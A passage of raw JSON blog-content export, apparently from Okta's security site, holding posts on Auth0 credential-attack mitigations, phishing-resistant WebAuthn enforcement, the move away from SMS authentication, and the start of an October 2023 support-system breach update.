\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/authenticate/database-connections/password-options\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"password policy\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Require -Factor Authentication. Auth0 offers a variety of MFA options available on our B2C Professional, B2B Essentials, B2B Professional, Startup, and Enterprise plans.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Short-term mitigations:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"For any tenant that does not use \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/authenticate/login/cross-origin-authentication\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"cross-origin authentication\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", that endpoint can be disabled in the Auth0 Management Console to eliminate this attack vector. Refer to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/get-started/applications/set-up-cors#configure-cross-origin-authentication\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Configure Cross-Origin Resource Sharing\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for more information.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Restrict permitted origins if cross-origin authentication is required.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enable \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/secure/attack-protection/breached-password-detection#configure-breached-password-detection\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"breached password detection\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for your tenant, or ideally \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/docs/secure/attack-protection/breached-password-detection#detect-breaches-faster-with-credential-guard\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Credential Guard\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" if it is supported in your current plan.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Breached password detection is available on our B2C Professional, B2B Professional, Startup, and Enterprise plans.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Credential Guard is available as an add-on through an Enterprise plan.\",\"marks\":[],\"data\":{}}]}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If you have an account with support available and need more information, you can reach out to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://support.auth0.com/tickets/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Customer Support\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", and if you are on a free plan you can reach us via the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://community.auth0.com/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Community\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". For details on features and availability per plan, please visit our \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://auth0.com/pricing\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"pricing page\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-06-08T05:27:37.411Z","secAuthor":[{"id":"1e934185-d220-5cf6-915f-afe21369ab6b","bio":{"bio":""},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/2mSwf13fQ5aH31DZNddqtd/0855adabe0c07ddc9ceaa460ebd1d935/Okta_Aura_CMYK_Black.jpg"},"name":"Okta","jobTitle":"","slug":"okta","node_locale":"en"}]},{"slug":"/articles/2023/07/unexpected-endorsement-webauthn","id":"d02e836f-c1d9-5f32-9584-8646872c9643","title":"An Unexpected Endorsement for WebAuthn","date":"2023-07-27T01:43:04+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Security endorses phishing resistant authentication at every opportunity.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We’ve long argued enrolling users in Okta FastPass, FIDO2 WebAuthn authenticators or Smart Cards, and enforcing phishing resistant authentication flows will:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Protect users against \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/phishingasaservice\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"real-time phishing proxies\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" and other forms of \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/sessioncookietheft\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"session hijacking\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Solve for far more attacks than simply adding Number Challenge to Push notifications to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/pushfatigueworkflows\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"defeat MFA Fatigue\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Offer \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/fastpassphishingdetection\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"detection opportunities\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" via System Log and the automation of phishing remediation, identifying potential account takeovers and preventing future attacks in a few seconds.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Provide a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/the-secure-sign-in-trends-report/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"superior user experience\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", without any adverse impacts on enrolment duration or failure rates.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"But don’t take our word for it.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The SMS below was recently sent by a prolific threat actor attempting to convince users at a large tech company to click through to a phishing kit:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"7HJAWRoNL2BhR1QErz58io\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"That’s probably the best endorsement for enforcing phishing-resistant sign-in yet!\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enforcement is everything\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Celebrity endorsements aside, this is a story about enforcement.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Step one to thwarting phishing attacks is to require users to enroll in strong authenticators. Users required to enroll in Okta FastPass or FIDO2 WebAuthn can authenticate to just about any app that requires two distinct factors. Independently, each of these two authenticators can each satisfy possession and inherence factors in 2-3 seconds.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"But that’s not where the task ends.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As this crafty lure demonstrates, Step two is to enforce phishing resistance in policy, as seen in the screenshot below. Social engineers may otherwise convince users to accept a lower assurance authenticator (passwords, OTPs, push notifications), on the chance that those sign-in methods satisfy policy requirements.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"6hmPALkOzevI3fGYl5mFev\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This lure also demonstrates why a little redundancy can go a long way.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We recommend requiring users to enroll in \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"both\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" Okta FastPass and FIDO2 WebAuthn (rather than FastPass “or” FIDO2), as well as enforcing phishing resistance.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"That might sound like overkill: both authenticators would prevent the user from compromise, and both can be configured to satisfy two factors in one gesture. So why have both enrolled?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If a threat actor did manage to convince a user to unplug their security key, the tricked user would still be able to sign-in to your organization using FastPass - just not via the attacker’s proxy! And as an added bonus, it may ease the pain on support teams if users are prone to misplacing their security keys.\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-06-07T21:46:05.008Z","secAuthor":[{"id":"40144a58-c93f-5b84-895a-5658f212b168","bio":{"bio":"The Defensive Cyber Operations (DCO) team is responsible for detecting and responding to cyber threats that impact Okta or our customers via the Okta platform. Our intelligence-driven capability identifies the adversaries most likely to impact Okta and our customers, and prioritises our defensive capabilities based on the threats most likely to be realised.
"},"image":null,"name":"Defensive Cyber Operations","jobTitle":"","slug":"defensive-cyber-operations","node_locale":"en"},{"id":"e0099522-136e-5003-b6a5-f4499896bf19","bio":{"bio":"Brett Winterford is Vice President of Okta Threat Intelligence. Okta Threat Intelligence delivers timely, highly relevant and actionable insights about the threat environment, with a focus on identity-based threats. Brett was previously the regional Chief Security Officer for Okta in the Asia Pacific and Japan, and advised business and technology leaders in the region on all things identity. Prior to Okta, Brett held a senior security leadership role at Symantec, and helmed security research, awareness and education at Commonwealth Bank. Brett is also an award-winning journalist, editor-in-chief of iTnews Australia and a contributor to the Risky Business podcast and newsletter, to ZDNet, the Australian Financial Review and the Sydney Morning Herald.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5cVIStynit3itWxHA4pv8S/8e8e647b20b34abcaff72ee837cb797c/Brett_20Resized.jpg"},"name":"Brett Winterford","jobTitle":"VP, Okta Threat Intelligence","slug":"brett-winterford","node_locale":"en"}]},{"slug":"/articles/2023/08/byo-telephony-and-future-sms-okta","id":"3f6606c3-8476-5f37-8b3a-ef7166c4f5b7","title":"BYO Telephony and the future of SMS at Okta","date":"2023-08-28T21:23:39+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SMS has long played an important role as a universally applicable method of verifying a user’s identity via one-time passcodes. And over the last decade, SMS and voice-based Multi-factor Authentication has prevented untold attempts to compromise user accounts.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"But it’s time to move on.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As of August 2023, any new Okta customer choosing to authenticate users via SMS or voice must configure their own \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/telephony/about-telephony.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Telephony\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" provider, just as they would any other \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/MFA_Custom_Factor.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"custom IdP\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" or \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/Content/Topics/Security/mfa-totp-seed.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"custom TOTP\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" factor. Starting September 15, 2024, at time of renewal, all existing customers must also bring their own telephony provider if they choose to continue to use SMS or voice.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In order to maintain flexibility, Okta doesn’t intend to deprecate the SMS authenticator. Nonetheless, Okta Security urges customers to accelerate their transition to passwordless with \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/phishingasaservice\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"phishing-resistant factors\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" like FastPass or FIDO2 WebAuthn.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The good news? Migrating users to FastPass comes at no additional licensing cost.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SMS offers limited assurance\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Let’s explore some of the reasons why customers should begin planning a transition away from SMS/Voice:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"ordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SMS lacks phishing resistance\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The one-time secret communicated in an SMS is not cryptographically bound in any way to the authenticator. There is nothing to stop an adversary from extracting the secret during phishing or social engineering attacks, and modern phishing tools make it trivial to defeat SMS-based authentication. Phishing Resistance is a property that only Okta FastPass, FIDO2 Webauthn and PIV Smart Cards offer in the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/authenticators/phishing-resistant-auth.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Identity Engine\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" today.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"2. The channel for sending secrets is outside of your organization’s control\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Personal webmail and SMS are two categories of authenticator in which the channel for communication of a secret lies outside of the control of the IT administrator. This property can and often has been exploited by adversaries. The most common form of abuse is when adversaries convince support staff at telecommunications providers to perform a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://krebsonsecurity.com/2022/08/how-1-time-passcodes-became-a-corporate-liability/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"SIM Swap\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", moving the target account for one time secrets to a mobile device they control. There are other examples of adversaries using \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.cyber.nj.gov/informational-report/sim-swapping-attacks\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"social engineering or bribes\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" with staff at telecommunications providers to perform SIM swapping. At the more extreme end, adversaries have attacked telecommunications providers or organizations that generate OTPs directly in an attempt to perform SIM Swaps or intercept OTPs sent to user devices.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"3. SMS does not offer device signals\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As described above, SMS doesn’t link a user with a device they possess with very high assurance. This is a property that Okta Verify (both using FastPass or Push notifications) and FIDO2 WebAuthn can satisfy. FastPass Device Assurance can also \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/device-assurance.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"assess the posture (health) of the device\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" associated with a user signing in. Little wonder that given a choice, adversaries tend to add and use SMS/voice factor over others to sign-in to compromised accounts.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"4. SMS underperforms on usability\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As Okta’s recent \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/the-secure-sign-in-trends-report/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Secure SignIn Trends\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" report demonstrated, it takes around three times longer for a user to login via password and SMS than via passwordless, phishing resistant authenticators. It’s also more subject to user error, generating large volumes of benign events that offer little in the way of confidence to a security analyst.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What your regulator thinks of SMS\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"It doesn’t take an expert in forecasting to note which way the wind is blowing for SMS-based MFA. As far back as 2017, NIST recommended against using phone-based authentication such as SMS in the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://pages.nist.gov/800-63-3/sp800-63b.html#restricted\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"800-63-3 guidance document\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Earlier this month, the US Cyber Safety Review Board \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.cisa.gov/sites/default/files/2023-08/CSRB_Lapsus%24_508c.pdf\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"recommended\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" that \\\"organizations urgently implement improved access controls and authentication methods and transition away from voice and SMS-based MFA.\\\" In a recent settlement, the Federal Trade Commission (FTC) specifically \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://iapp.org/news/a/the-ftcs-rapidly-evolving-standards-for-mfa/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"prohibited a company\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" from using SMS-based MFA. And it’s not just in the United States. The UK’s National Cyber Security Centre (NCSC) recommends organizations to consider alternatives to SMS. “There are many ways by which SMS can be compromised and full defence against such attacks is not possible”. The Central Bank of Malaysia now \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.bnm.gov.my/-/financial-crime-exhibition-speech-en\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"requires banks\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" to make the same transition. Next door, Singapore’s Monetary Authority of Singapore (MAS) intends to “\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sg.finance.yahoo.com/news/sms-otp-mas-set-deadline-banks-phase-out-sole-authentication-factor-024151724.html?guccounter=1&guce_referrer=aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS8&guce_referrer_sig=AQAAAJabatKOPTP5ITkmNL-pVh89mrlMdbVmAYHnJDaMbk5QtWPq6RWmsglGOH1W-6TSMmwverZsQcECVk__ZyC2NFzYgcBXj6gvJ2-y5qdChNfw-6pzPuekRro7kRZZHnv0YadqCu_vc6Z6B1MjFhLknkMyCXa28VGS0FiOmS8-uo2Z\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"set a deadline\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for all retail banks to phase out the use of Short Messaging Service (SMS) one-time passwords (OTP) as a sole authentication factor for high-risk transactions.\\\" Which means, again \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.cisa.gov/sites/default/files/publications/fact-sheet-implementing-phishing-resistant-mfa-508c.pdf\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"per our pals at CISA\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", “phishing-resistant MFA is the gold standard and organizations should make migrating to it a high priority effort”.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"SMS and Shared Responsibility\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"At Okta, we are regularly impressed by the different ways our customers leverage identity to create value in their organizations. We also endeavor to make it easy for those customers to deliver the most secure and user-friendly authentication experience. Strong, user-friendly authentication is provided by Okta Verify as part of the Okta service, and meets most use cases. We offer a broad range of other authenticators to choose from too. Customers are free to choose SMS and voice for authentication, if the use case requires and its use is within risk tolerance. That said, if your organization chooses to authenticate users via SMS, it’s important to perform your own due diligence on which SMS/telephony provider best meets your needs.\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-06-07T21:27:19.039Z","secAuthor":[{"id":"15f85411-1854-5e47-b48b-c00cd215bafd","bio":{"bio":"Ben King is the Vice President for Security Trust and Culture at Okta. He leads the Field Security, Customer Assurance, Customer Audit, Security Communications and Culture teams operating across the Americas, Europe and APJ. Prior to joining Okta, Ben was in a regional cybersecurity leadership role for Symantec, and spent 11 years at the Commonwealth Bank of Australia in a variety technology and cybersecurity strategy and governance roles, including as Cybersecurity lead for Europe. Ben has built a reputation for creating and leading high performing teams, having lived and worked in Australia, the United Kingdom, Canada and the USA. He holds a Bachelor of Engineering and a Bachelor of Commerce from the University of Sydney.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/324uLkdOfj2XYPSpvXc8lH/2f6c417af2a3e3d074faac828bf8b9cf/ben-king-okta-trust.png"},"name":"Ben King","jobTitle":"VP, Security Trust & Culture","slug":"ben-king","node_locale":"en"}]},{"slug":"/october-security-incident-recommended-actions","id":"464babfd-2800-5528-b4e1-faa14338c428","title":"October Customer Support Security Incident - Update and Recommended Actions ","date":"2023-11-29T08:03:19+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Related Posts: \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/11/unauthorized-access-oktas-support-case-management-system-root-cause\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Root Cause Analysis [RCA]\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" - Nov 3, 2023 / \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/10/tracking-unauthorized-access-oktas-support-system\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Security Incident\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" - Oct 20, 2023\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In the wake of the security incident Okta \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/10/tracking-unauthorized-access-oktas-support-system\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"disclosed\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" in October 2023 affecting our customer support management system (also known as the Okta Help Center), Okta Security has continued to review our initial analysis \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://sec.okta.com/articles/2023/11/unauthorized-access-oktas-support-case-management-system-root-cause\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"shared\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" on November 3, re-examining the actions that the threat actor performed. This included manually recreating reports the threat actor ran in the system and the files the threat actor downloaded.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Today we are sharing new information that potentially impacts the security of our customers.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"We have determined that the threat actor ran and downloaded a report that contained the names and email addresses of all Okta customer support system users. All Okta Workforce Identity Cloud (WIC) and Customer Identity Solution (CIS) customers are impacted except customers in our FedRamp High and DoD IL4 environments (these environments use a separate support system NOT accessed by the threat actor). The Auth0/CIC support case management system was also not impacted by this incident.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The threat actor ran a report on September 28, 2023 at 15:06 UTC that contained the following fields for each user in Okta’s customer support system:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Created Date\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Last 